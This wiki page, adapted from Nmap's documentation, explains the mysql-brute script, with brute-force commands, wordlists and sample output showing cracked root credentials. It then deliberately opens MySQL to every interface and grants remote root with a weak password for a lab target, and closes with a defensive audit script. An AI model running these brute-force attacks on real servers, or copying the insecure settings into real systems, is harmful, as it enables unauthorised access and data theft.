Nmap: brute force hack mysql password

From OnnoCenterWiki
Onnowpurbo (talk | contribs)
Latest revision as of 03:08, 2 June 2018

Source: https://nmap.org/nsedoc/scripts/mysql-brute.html




File mysql-brute

Script types: portrule
Categories: intrusive, brute
Download: http://nmap.org/svn/scripts/mysql-brute.nse

User Summary

Brute-forces the MySQL password.


Example Usage

Contents of user.txt:

admin
root
etc.

Contents of pass.txt:

123456
123456789
etc.


nmap --script=mysql-brute <target>
nmap -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt --script-trace 192.168.0.100
nmap -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt,passdb=/root/pass.txt --script-trace 192.168.0.100


NSE Notes

The default lists of usernames and passwords are in

/usr/share/nmap/nselib/data

Files

usernames.lst
passwords.lst

Script Output

3306/tcp open  mysql
| mysql-brute:
|   Accounts
|     root:root - Valid credentials


Creating a Hole in MySQL

This attack only works if MySQL is misconfigured.

  • A normal MySQL installation binds only to localhost, meaning only those on localhost can attack it.
  • To bind MySQL to the Ethernet interface, or to all interfaces:
vi /etc/mysql/mysql.conf.d/mysqld.cnf 
# bind-address          = 127.0.0.1
bind-address            = 0.0.0.0
max_connections         = 1000


  • Grant root access to the attacker's IP, or to all IPs (assuming root password = 123456)
mysql -u root -p123456

GRANT ALL ON *.* to root@'123.123.123.123' IDENTIFIED BY 'put-your-password';
FLUSH PRIVILEGES;
exit

or

GRANT ALL ON *.* to root@'%' IDENTIFIED BY '123456';
FLUSH PRIVILEGES;
exit
  • Check with this command (assuming password = 123456)
mysql -u root -h ip-address-server -p123456

The output will be:

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 50069
Server version: 5.7.11-0ubuntu6 (Ubuntu)

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>
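
An added example (not from the original page or from the Nmap project): a small Python audit for the two misconfigurations this section introduces, a non-loopback bind-address and a root account allowed from remote hosts. The function names, the `[mysqld]` header in the sample, and the account rows (shaped like the result of `SELECT user, host FROM mysql.user`) are constructed for illustration.

```python
import re

# Constructed sample input: the weakened option file and account rows from the section above.
SAMPLE_CNF = """\
[mysqld]
# bind-address          = 127.0.0.1
bind-address            = 0.0.0.0
max_connections         = 1000
"""
SAMPLE_ACCOUNTS = [("root", "localhost"), ("root", "%"), ("root", "123.123.123.123")]
LOOPBACK = {"127.0.0.1", "::1", "localhost"}
ALL_INTERFACES = {"0.0.0.0", "::", "*"}


def effective_bind_address(cnf_text):
    """Return the bind-address set in this option file text, or None if unset."""
    section, value = None, None
    for raw in cnf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # commented-out settings have no effect
        m = re.fullmatch(r"\[([^\]]+)\]", line)
        if m:
            section = m.group(1).lower()
            continue
        key, _, val = line.partition("=")
        # Option files accept bind-address and bind_address; the last one wins.
        if section in ("mysqld", "server") and key.strip().replace("_", "-") == "bind-address":
            value = val.strip().strip("'\"")
    return value


def audit(cnf_text, accounts):
    """Return a list of findings for network exposure and remote root accounts."""
    findings = []
    addr = effective_bind_address(cnf_text)
    if addr is None:
        findings.append("bind-address not set here: check SHOW VARIABLES LIKE 'bind_address'")
    elif addr in ALL_INTERFACES:
        findings.append(f"bind-address={addr}: listening on every interface")
    elif addr not in LOOPBACK:
        findings.append(f"bind-address={addr}: reachable from the network")
    for user, host in accounts:
        if user == "root" and host not in LOOPBACK:
            kind = "a wildcard host pattern" if "%" in host else "a remote host"
            findings.append(f"'{user}'@'{host}': root can log in from {kind}")
    return findings
```

Calling `audit(SAMPLE_CNF, SAMPLE_ACCOUNTS)` reports the 0.0.0.0 binding and both remote root accounts; a file with `bind-address = 127.0.0.1` and only `root@localhost` returns an empty list.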

References